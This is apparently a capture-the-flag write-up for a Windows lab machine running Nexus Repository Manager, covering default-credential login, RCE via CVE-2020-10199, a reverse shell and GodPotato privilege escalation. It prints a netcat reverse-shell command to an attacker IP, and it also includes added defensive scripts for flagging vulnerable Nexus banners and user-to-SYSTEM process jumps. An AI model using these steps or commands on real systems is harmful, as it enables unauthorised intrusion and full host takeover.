BILLYBOSS

1-Nmap

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http    Microsoft IIS httpd 10.0
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-server-header: Microsoft-IIS/10.0
|_http-title: BaGet
8081/tcp open  http    Jetty 9.4.18.v20190429
| http-robots.txt: 2 disallowed entries
|_/repository/ /service/
|_http-server-header: Nexus/3.21.0-05 (OSS)
|_http-title: Nexus Repository Manager
| http-enum:
|_  /robots.txt: Robots file
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

2-Port 8081

There are two web pages, one on port 80 and the other on port 8081. On port 80 we found nothing that caught our attention, so we went to port 8081 and found a Sonatype Nexus Repository Manager dashboard:

Sonatype Nexus Dashboard

3-Log in

Looking for information, we found that this version of Nexus is vulnerable to the RCE CVE-2020-10199, but authentication is required. Looking in the documentation, we found that the default credentials are either admin/admin123, nexus/nexus123 or nexus/nexus. After trying all three, the only one that works is the last one:

Log in as nexus
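From the defender's side, the two facts that made this step possible (an unpatched Nexus build announced in the Server header, and a default account still enabled) are the ones to catch in vulnerability management. The script below is an added example and is not part of the original writeup: it parses the nmap -sV lines shown in section 1 (embedded here as constructed sample input) and flags any Nexus Repository Manager whose banner version is below a fixed-version threshold. The threshold 3.21.2 is the release Sonatype's advisory for CVE-2020-10199 lists as fixed; treat it as an assumption and check it against the current advisory before relying on it.

```python
import re

# Constructed sample: the service lines from the nmap scan in section 1.
NMAP_OUTPUT = """\
21/tcp   open  ftp     Microsoft ftpd
80/tcp   open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
8081/tcp open  http    Jetty 9.4.18.v20190429
|_http-server-header: Nexus/3.21.0-05 (OSS)
"""

# Assumption: first Nexus 3 release with the CVE-2020-10199 fix (per Sonatype's
# advisory). Adjust if your advisory source says otherwise.
NEXUS_FIXED_VERSION = (3, 21, 2)

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+(.*)$")
HEADER_RE = re.compile(r"^\|_http-server-header:\s+(.*)$")
NEXUS_RE = re.compile(r"Nexus/(\d+)\.(\d+)\.(\d+)")


def parse_services(text):
    """Turn nmap -sV output into a list of {port, service, product, server_header}.

    An http-server-header script line is attached to the most recent port entry,
    which is how nmap prints it.
    """
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            services.append({
                "port": int(m.group(1)),
                "service": m.group(2),
                "product": m.group(3).strip(),
                "server_header": None,
            })
            continue
        h = HEADER_RE.match(line)
        if h and services:
            services[-1]["server_header"] = h.group(1).strip()
    return services


def nexus_findings(services):
    """Flag every Nexus instance whose banner version is older than the fixed release."""
    findings = []
    for svc in services:
        m = NEXUS_RE.search(svc.get("server_header") or "")
        if not m:
            continue
        version = tuple(int(x) for x in m.groups())
        if version < NEXUS_FIXED_VERSION:
            findings.append({
                "port": svc["port"],
                "version": version,
                "issue": "Nexus below %d.%d.%d: affected by CVE-2020-10199; "
                         "upgrade and make sure default accounts are disabled"
                         % NEXUS_FIXED_VERSION,
            })
    return findings


if __name__ == "__main__":
    for f in nexus_findings(parse_services(NMAP_OUTPUT)):
        print("port %d: Nexus %s -> %s" % (f["port"], ".".join(map(str, f["version"])), f["issue"]))
```

The version comparison is on the numeric tuple, so a banner such as Nexus/3.21.0-05 is read as 3.21.0 and the build suffix is ignored; a banner that has been stripped or rewritten by a reverse proxy will produce no finding, which is a reason to pair banner checks with authenticated inventory rather than rely on them alone.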

4-Revshell

We can now execute commands with the exploit for CVE-2020-10199. We are going to run a reverse shell directly, using the revshells web page (https://www.revshells.com/) to generate a base64-encoded PowerShell payload:

Generate a reverse shell

5-Exploit

Next, modify the exploit to change the target IP and the payload:

Modify the exploit

Execute the exploit:

Run the exploit

Listening at the same time with nc on port 443, we get the reverse shell as nathan:

Get the reverse shell as nathan

6-Privilege Escalation

After a long enumeration, I googled the Windows build number and found the Windows 10 version history on Wikipedia: build 18362 corresponds to version 1903. The user we are running as, nathan, has SeImpersonatePrivilege enabled, which makes him the perfect candidate for a Potato attack. There is a recent Potato privilege escalation exploit, GodPotato (https://github.com/BeichenDream/GodPotato), that works on newer versions of Windows, so we transfer it to the victim machine and then run a reverse shell with it.

PS C:\Users\nathan> .\godp.exe -cmd "cmd /c C:\Users\nathan\nc.exe 192.168.45.177 443 -e cmd.exe"

Reverse Shell with GodPotato

As we can see, a new process is created as NT AUTHORITY\SYSTEM, and we get the shell:
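What just happened on the host is a user-to-SYSTEM jump with no service or scheduler in between: a SYSTEM cmd.exe whose parent (godp.exe) runs as nathan. That parent/child account mismatch is the signal a detection engineer would look for in process-creation telemetry. The script below is an added example, not part of the writeup: it runs that check over a few constructed log lines. The field names (EventID, Image, User, ParentImage, ParentUser) are borrowed from Sysmon Event ID 1; the one-record-per-line key=value layout is constructed for the example and is not the real Sysmon XML, so adapt parse_event to whatever your pipeline emits.

```python
import re

# Accounts whose children are expected to run as SYSTEM-level identities.
SYSTEM_ACCOUNTS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
}

# Constructed sample log: one process-creation record per line, key=value pairs.
# Line 2 models the GodPotato step from this writeup; lines 1 and 3 are benign.
SAMPLE_LOG = """\
EventID=1 Image=C:\\Windows\\System32\\cmd.exe User=BILLYBOSS\\nathan ParentImage=C:\\Users\\nathan\\godp.exe ParentUser=BILLYBOSS\\nathan
EventID=1 Image=C:\\Windows\\System32\\cmd.exe User=NT AUTHORITY\\SYSTEM ParentImage=C:\\Users\\nathan\\godp.exe ParentUser=BILLYBOSS\\nathan
EventID=1 Image=C:\\Windows\\System32\\svchost.exe User=NT AUTHORITY\\SYSTEM ParentImage=C:\\Windows\\System32\\services.exe ParentUser=NT AUTHORITY\\SYSTEM
"""

# Values may contain spaces (e.g. "NT AUTHORITY\SYSTEM"), so a value runs until
# the next " key=" token or the end of the line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line):
    """Parse one constructed key=value record into a dict."""
    return dict(FIELD_RE.findall(line))


def is_privilege_jump(event):
    """True when a SYSTEM-level child was spawned by a parent running as an ordinary user."""
    child = event.get("User", "")
    parent = event.get("ParentUser", "")
    return child in SYSTEM_ACCOUNTS and parent != "" and parent not in SYSTEM_ACCOUNTS


def find_privilege_jumps(log_text):
    """Return every process-creation event that shows a user-to-SYSTEM jump."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        if event.get("EventID") == "1" and is_privilege_jump(event):
            hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in find_privilege_jumps(SAMPLE_LOG):
        print("ALERT: %s (%s) spawned %s as %s"
              % (hit["ParentImage"], hit["ParentUser"], hit["Image"], hit["User"]))
```

The rule is deliberately narrow: a user-owned parent producing a SYSTEM child is rare on a healthy host, because legitimate elevation goes through a service, the Task Scheduler or the installer service, all of which appear as a SYSTEM parent. Expect to allow-list a few products that spawn helper processes through their own service, and note that the check depends on the log source recording the parent's account, which older Sysmon versions do not.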
